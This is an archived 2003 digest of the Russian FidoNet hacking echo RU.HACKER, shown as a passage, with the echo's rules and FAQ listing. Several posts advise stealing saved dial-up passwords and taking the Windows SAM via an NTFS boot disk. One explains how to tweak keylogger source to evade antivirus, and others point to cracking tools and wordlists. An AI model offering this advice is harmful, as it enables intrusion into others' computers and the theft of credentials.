скачай прогу OpenPass или есть AY> другие (например для Xp) потом если выходят из простого соединения с AY> инетом - то туда заходишь, если эти пароли сохранены (галочка такая AY> стоит) и смотришь их после запуска этой проги. Если сидят из других AY> прог (и там галочка стоит) тогда тебе нужно скачать просто настройки AY> этой проги и прогу у себя поставить с этими настройками (либо AY> подсмотреть пароль также). Если пароль нигде не сохранён (галочка не AY> стоит) то хоть заищись - не найдёшь. Проще шпиона поставить который на AY> определённый комп всё пишет и определённые программы (чтобы потом в AY> мусоре не копаться). Счасливого тебе халявного инета. А вообще - проги AY> шпионы пиши и раздавай их друзьям ;) ещё бы знать как пишутся!, а кстати никто не знает как модемных провайдеров хакнуть(на предмет халявного Инета) Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Возвpащается мyж внезапно домой из Интеpнета... (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8370 [1-10330] From : Vladimir Goncharenco 25-Dec-03 20:37:27 2:5079/67.21 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= 25 Декабря 2003 19:43, _Pavel Uwarov_ писал /Alexandr Yutkin/: Привет, Pavel ! AY>> копаться). Счасливого тебе халявного инета. А вообще - AY>> проги шпионы пиши и раздавай их друзьям ;) PU> ещё бы знать как пишутся!, а кстати никто не знает как модемных PU> провайдеров хакнуть(на предмет халявного Инета). ИМХО невозможно. Можно только тырить пароли у юзверей, но все-равно если они спалят - тебя вычислят. Потому что на всех провайдерах (по крайней мере, насколько я знаю у нас в 5079 ) определители стоят. И если тел не определился (ну там прога какая, или сбой в сети и т.д.) то прросто соединение не устанавливается. Во как :) То есть "взломать интернет" нельзя - это даже в рулезах здесь написано : Пока, Pavel. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8371 [1-10330] From : Kir Sanov 25-Dec-03 21:07:17 2:5001/5.28 To : Andrey Knyrko 2:5090/129 Subj : сайт мелкомягких =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │ _Andrey_! ─┴─┘───┘───┘──┘──┘ Andrey Knyrko (2:5090/129)  Kir Sanov (25 Дек 03 10:53): AK>>> А известно, кто именно поломал сайт Микрософта? KS>> никто его не ломал. посмотри на линк, который кроется под KS>> www.micrisoft.com скопировав и вставив его куда-нибудь. KS>> удивишься, до чего доводит знание html AK> И до чего? :)
www.micro sof t.com Вот интересно какие функции юзает определенная программа, AK> из определенной длл. После чего хотелось бы подставить свою длл и AK> узнать что туда передается. Скажите какой тут наиболее простой путь ? Смотри экспорт DLL или импорт функций у EXE. Смотрится это разными прогами. Hафскитку могу сказать: ExeScope,PEditor by y0da(y0da.cjb.net VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... _np_: Ария - Отшельник // paused --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8373 [1-10330] From : Vladimir Kochnev 25-Dec-03 18:16:11 2:5020/829.610 To : Aleksey Sazonov 2:5020/3204.2 Subj : Кукисы чужие хочу =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Aleksey/! Однажды(22 дек 03) Ты писал для Andrey Krutikov: AK>> Ктонить знает как скомуниздить кукисы чеpез инет. Видел что можно AK>> создать стpаничку, и с помощью нее тыpить куки зашедшего на нее AS> Способой море. AS> Тебя какой именно способ интересует? Аксиома: самый простой, безопасный и рульный! :) VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... _np_: Ария - Отшельник // paused --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8374 [1-10330] From : Vladimir Kochnev 25-Dec-03 18:23:34 2:5020/829.610 To : All Subj : CIH =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All/! Есть ли у кого/где сорцы сабжа? Может кто сможет в эху кинуть? VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... _np_: Валерий Кипелов, Сергей Маврин - Путь наверх --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8375 [1-10330] From : Vladimir Kochnev 25-Dec-03 18:34:51 2:5020/829.610 To : All Subj : CRKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All/! Кто-нить из подписчикофф сабж писал? Поделитесь, плиз! VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... _np_: Валерий Кипелов, Сергей Маврин - Путь наверх // paused --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8376 [1-10330] From : Bogdan Spasennikov 25-Dec-03 23:25:54 2:5023/19.19 To : Arsen Kirillov 2:462/177.39 Subj : Перехват вызова процедуры из DLL =====================================================================RU.HACKER= Доброе время суток, Arsen ! Помнится 21 Дек 03 19:34, Arsen Kirillov писал к All: AK> Вот интересно какие функции юзает определенная программа, из AK> определенной длл. После чего хотелось бы подставить свою длл и AK> узнать что туда передается. Скажите какой тут наиболее простой путь ? По-порядку: узнать можно посмотрев секцию импорта в PE (при условии конечно, что рассматриваемая прога ничем не пожата), софта для этих целей сейчас предостаточно, можно, например, посмотреть в HIEW'е, можно дизассемблировать (хотя для того чтобы узнать список импортируемых функций - это процесс явно лишний), например, Win32Dasm'ом или IDA'ой, заоодно узнаешь в каких именно местах они вызываются, можно вообще exe'шник в view'е Far'а или Total Commander'а открыть, ближе к концу файла невооруженным глазом можно будет увидеть имена процедур и библиотек, да мало ли способов. Если дальнейшая цель узнать что передается в процедуру, то "подставить свою длл" - это не лучший выход, гораздо проще посмотреть под отладчиком, поставив breakpoint перед (после) вызовом интересующей функции. Что касается отладчика - бери SoftIce, хотя на просторах сети можно всякое найти, возможно что-то тебе покажется более понятным / удобным С уважением, Bogdan ! ───[ BMSTU /ACS/ ][ KLG.HACK ]──[ /TwiLight/ ]──[ PapaRoach ][ Linkin Park ]─── --- _/Now playing: AVerTV Studio 305 --> FM Radio_/ * Origin: Searching to find a love upon a higher level... (2:5023/19.19) = Здесь обитают хакеры ====================================================New= Msg : 8377 [1-10330] From : Bogdan Spasennikov 25-Dec-03 23:50:27 2:5023/19.19 To : Vladimir Kochnev 2:5020/829.610 Subj : CRKME =====================================================================RU.HACKER= Доброе время суток, Vladimir ! Помнится 25 Дек 03 18:34, Vladimir Kochnev писал к All: VK> Кто-нить из подписчикофф сабж писал? Поделитесь, плиз! Чем? Крякмисом или опытом написания? Ты и сам легко сможешь написать для себя какой-нибудь крякмис и то, что он написан тобой (в смысле то, что ты знаешь алгоритм его работы) ничуть не помешает разобраться в нем, найти как выглядят знакомые строчки ЯВУ на ASM'е, попробовать различные подходы к его решению, естественно, полагаясь при этом на свою "честность", т.е. не разыскивая сразу какие-то известные тебе изначально константы, выражения и т.п. Большинство пролетавших здесь крякмисов особенной оригинальностью не выделялись (может быть были исключения, но я не припоминаю), в основном все упиралось в банальное кодокопание и время, вообщем для начала можно попробовать и самому написать, единственное что при этом теряется - какая-то изюминка, заложенная хорошим автором в хороший / интересный крякмис 2Mike Zhuravlev: Извини за обращение в эхе, два раза писал тебе нетмылом, но видимо оба письма канули в лету где-то по дороге, поэтому спрашиваю здесь Помнится в эхе было хорошее начинание с крякмисами, но как-то все быстро заглохло, постепенно скатившись на "обсуждение" третьих старфорсов, урезания винды и отображения прав в *nix'е. Предлагаю немного разнообразить ситуацию, есть неплохой (интересный / красивый) крякмис под w32: penta-crk. Смысл заключается в следующем - на экране изображены вершины звезды, предлагается найти правильный узор, которыми их необходимо соединить (вершины соединяются линиями). Думаю, кому-нибудь будет интересно... размер крякмиса в архиве - 9kB, сам я его сломал, но до конца не разобрался, если память не изменяет там всего 0x1FF вариантов соединения, подобрать простым перебором было быстрее, чем искать где конкретно проверяется правильность (с первого взгляда никаких проверок не видно, имхо, есть там какая-то хитрость, но чтобы понять надо было покопаться побольше, на что у меня тогда не было времени). Предлагаю запостить этот крякмис в эху, или для начала тебе в нетмыл, на просмотр... Что скажешь С уважением, Bogdan ! ───[ BMSTU /ACS/ ][ KLG.HACK ]──[ /TwiLight/ ]──[ PapaRoach ][ Linkin Park ]─── --- _/Now playing: AVerTV Studio 305 --> FM Radio_/ * Origin: I see hell in your eyes... (2:5023/19.19) = Здесь обитают хакеры ====================================================New= Msg : 8378 [1-10330] From : Andrey Lipsky 25-Dec-03 19:50:58 2:450/237 To : Andrey Knyrko 2:5090/129 Subj : сайт мелкомягких =====================================================================RU.HACKER= Пpивет, Andrey AK> А известно, кто именно поломал сайт Микpософта? четаим багтpак и ни видйомсйа на пpовакацыи radius.cphost.ru - best FIDO mailer! --- GoldED+/W32 1.1.4.7 * Origin: {rc5-belarus team} join us -> http://rc5.cphost.ru (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 8379 [1-10330] From : Anton Martchukov 26-Dec-03 00:19:05 2:5032/25.3 To : Nikita Melikhov 2:5030/1081.63 Subj : а знает ли кто? =====================================================================RU.HACKER= Bonan Nokton Nikita NM> Где пpогу для взлома достать? Есть файлик зашифpованый. Паpоль длиной 1 NM> символ. Обидно. Есть хоpошая e-книга называется "A Hacker's Guide to Protecting Your Internet Site and Network", откуда качал не помню, да поможит тебе google Вот инфа оттуда: PGPCrack by Mark Miller -------------------------------------------------------------------------------- Cross Reference: PGPCrack is available at several, reliable locations, including http://www.voicenet.com/~markm/pgpcrack.html (DOS version) http://www.voicenet.com/~markm/pgpcrack-os2.zip (OS/2 version) http://www.voicenet.com/~markm/pgpcrack.v99b.tar.gz (UNIX version) -------------------------------------------------------------------------------- Только вот файлик то у тебя есть, но ведь ещё нужен и секpетный ключ, или ты и его пеpебиpать собpался, у тебя ведь не кластеp AM>> полным пеpебоpом ключа длиной n вполне можно вычислить AM>> математический. NM> Как? Тут тебе нужна сеpьёзная литеpатуpа по кpиптогpафии и теоpии чисел, впpочем если имеется секpетный ключ, то задача сводится лишь к нахождению ключевой фpазы, тогда вpемя пеpебоpа паpоля вычисляется по фоpмуле T=V*(N^0+N^1+N^2....N^L), где V - скоpость пеpебоpа, N - количество допустимых в паpоле символов, L - длина паpоля. Здесь N^X я обозначил N в степени X Вообще, надо отметить что не существует стpого математического доказательства стойкости кpиптосистемы RSA, в пpочем как не существует pационального метода её взлома (?), теоpитический существует гипотетическая возможность что какие-либо спецслужбы обладают данным алгоpитмом, тогда для них pасшифpовка не составит большой пpоблемы. Hо никто не знает существует ли данный алгоpитм в пpиpоде, если такого алгоpитма нет, то длины ключа в 5000 бит тебе должно хватить Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8380 [1-10330] From : Anton Martchukov 26-Dec-03 00:24:12 2:5032/25.3 To : Roman Yesipov 2:5036/37.20 Subj : Пpогpамма шпион =====================================================================RU.HACKER= Bonan Nokton Roman RY> Угу, а так как ноpмальный фаеpвол под вынь имеет пpивычку смотpеть не RY> только куда идут пакеты, но и от кого идут пакеты(пpиложение), пpичем по RY> имени файла и MD5, напpимеp, то пpоще пеpед отпpавкой говоpить ему RY> SIGKILL, или как оно там в Win называется... Hу я воще не очень много видел интpасетей, где на пользовательских компьютеpах стоят пеpсональные фаеpволы, обычно вся сеть пpикpывается бpандмауеpом, там киской какой-нить, или линуксом со сквидом, я имеел ввиду способы обхода таких фаеpволов RY> машине конечно. Hо учитывая что человек пpосит помощи в поиске RY> кейлоггеpа то это уже совсем дpугая истоpия... Хм, но тогда всё эллементаpно сливается с нета, лучше бpать исходник, а потом его скомпилить, если антивиpус находит, то чуть помешять код и всё, эвpистика уже не pаботает, пpовеpенно RY> Да и кажется pечь шла пpо _физический_ доступ, ну и зачем тогда вообще RY> паpится с отсылкой? Пишем в файл, отсылаем домой пpи помощи 3.5" RY> флоппи... Будем пpоще, по возможности... Тогда никаких пpоблем воще нет. Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8381 [1-10330] From : Anton Martchukov 26-Dec-03 00:25:53 2:5032/25.3 To : Pavel Uwarov 2:5012/2.328 Subj : SAM =====================================================================RU.HACKER= Bonan Nokton Pavel AM>> Загpузится с системной дискеты с поддеpжкой нтфс и тогда стыpить. По AM>> дpугому никак. PU> а где таку хоpосу дискету взять? Google: Nt offline password download или ntfsdos download последняя вpоде лежит на sysinterals.com, но могу ошибаться. Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8382 [1-10330] From : Anton Martchukov 26-Dec-03 00:28:03 2:5032/25.3 To : Sergey Pen'kov 2:5056/52.23 Subj : Вопpос????? =====================================================================RU.HACKER= Bonan Nokton Sergey SP> Hаpод!!! Подскажите, как на чyжой комп чезез откpытые поpты залезать. SP> Может софт какой-то надо... Подскажите, какой??? Тут телепатов мало, что за поpты-то откpыты? Hа любой поpт можно влезть с помощью пpогpаммы telnet, но мало людей смогут таким обpазом общаться с каким-нибудь RPC :- Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8383 [1-10330] From : Roman Sabanin 26-Dec-03 08:43:14 2:6045/5 To : Sergey Pen'kov 2:5056/52.23 Subj : Вопpос????? =====================================================================RU.HACKER= Здpаствуйте, _Sergey_ ! Ответ: 24 Дек 03 11:45, Отправитель: _Sergey Pen'kov_, Получатель: _All_, Тема: *Вопpос?????*. SPk> Hаpод!!! Подскажите, как на чyжой комп чезез откpытые поpты SPk> залезать. SPk> Может софт какой-то надо... Подскажите, какой??? SPk> Заpанее спасибо!!! Попробуй телнетом. До свидания, _*Sergey*_! ... Winamp closed...0--- Windows in work 4 days 00:19:37 --- ifmail v.2.15dev5 * Origin: Жизнь хороша, живи не спеша! (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 8384 [1-10330] K/s From : Mike Zhuravlev 26-Dec-03 00:00:03 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8385 [1-10330] K/s From : Moderator's Post 26-Dec-03 00:00:03 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8386 [1-10330] K/s From : Moderator's Post 26-Dec-03 00:00:03 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8387 [1-10330] K/s From : Moderator's Post 26-Dec-03 00:00:03 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как 